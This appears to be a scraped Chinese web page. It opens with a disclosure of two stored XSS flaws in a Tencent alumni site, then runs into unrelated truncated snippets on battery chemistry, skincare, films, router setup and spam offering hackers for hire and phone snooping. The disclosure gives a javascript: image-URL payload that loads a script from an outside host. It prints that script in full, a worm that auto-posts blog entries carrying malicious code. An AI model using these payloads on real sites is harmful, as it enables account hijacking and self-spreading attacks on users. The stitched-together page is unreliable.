作者:孤鸿影 作者已通知腾讯。 漏洞一: *** 校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。 *** 校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: 不会被执行。使用下面的格式既可:。加入defer属性,那么浏览器在下载脚本的时候就不会立即对其进行处理,而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。 漏洞二: *** 校友在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发: javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://xxxxxx.com/xy.js%22%3E%3C%2F%73%63%72%69%70%74%3E');xy.js的作用是自动发布一篇日志,这篇日志中可以插入恶意代码,代码如下: var url="/index.php?mod=blog&act=dopost"; var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0"; //日志内容,这里可以插入恶意代码 function _sd_Post(Url, Args) { var xmlhttp; var error; eval('try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp = null;error=e;}'); if(null != xmlhttp) { xmlhttp.Open("POST", Url, false); xmlhttp.setRequestHeader("x-requested-with", "XMLHttpRequest"); xmlhttp.setRequestHeader("Referer", "http://xy.qq.com/api_proxy.html"); xmlhttp.setRequestHeader("Accept", "application/json, text/javascript, */*"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Host", "xy.qq.com"); xmlhttp.Send(Args); strText = xmlhttp.responseText; } } _sd_Post(url,content);
17、铜—锌(盐酸)充电电池、铅酸蓄电池、氢气燃料电池(三氯化铁溶液)、生物醇油充电电池(三氯化铁溶液)、锌—氧化银(三氯化铁溶液)充电电池;金属材料的热电浸蚀。 18、电解氯化铜水溶液、电解法饱和食...
我知道大多数人是不祛角质的,说主要自己的皮肤太敏感了怕刺激,但是你不祛角质,脸上都是老废角质,会导致皮肤越来越粗糙,脏东西堵塞在毛孔里出不来,护肤品的营养又进不去,更容易敏感!这时候闭口啊、粉刺啊都出...
哪里找职业黑客相关问题 如何自学成为一名黑客相关问题 黑客怎么用手机找人 周阴婷 科普(周阴婷仙子) 黑客需要什么软件 手机怎么监听对方手机(如何监听对方手机) 网络黑...
如何知道自己手机被黑客(黑客手机号定位)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...
本文目录一览: 1、没有和我一样觉得很烂的么 2、冯小刚为她梳头、陈思诚开300万片酬力邀,27岁的她凭什么呢? 3、唐人街探案2好看么? 4、《唐人街探案2》:如果Q不是宋义,那么会是谁...
我们在应用电脑上的情况下,一直会碰到许多 的电脑上难点。在我们在碰到了FAST无线网络路由器重置后如何设置的情况下,那麼大家应当怎么办呢?今日就一起来追随专业知识屋的我看一下怎么解决的吧。 ...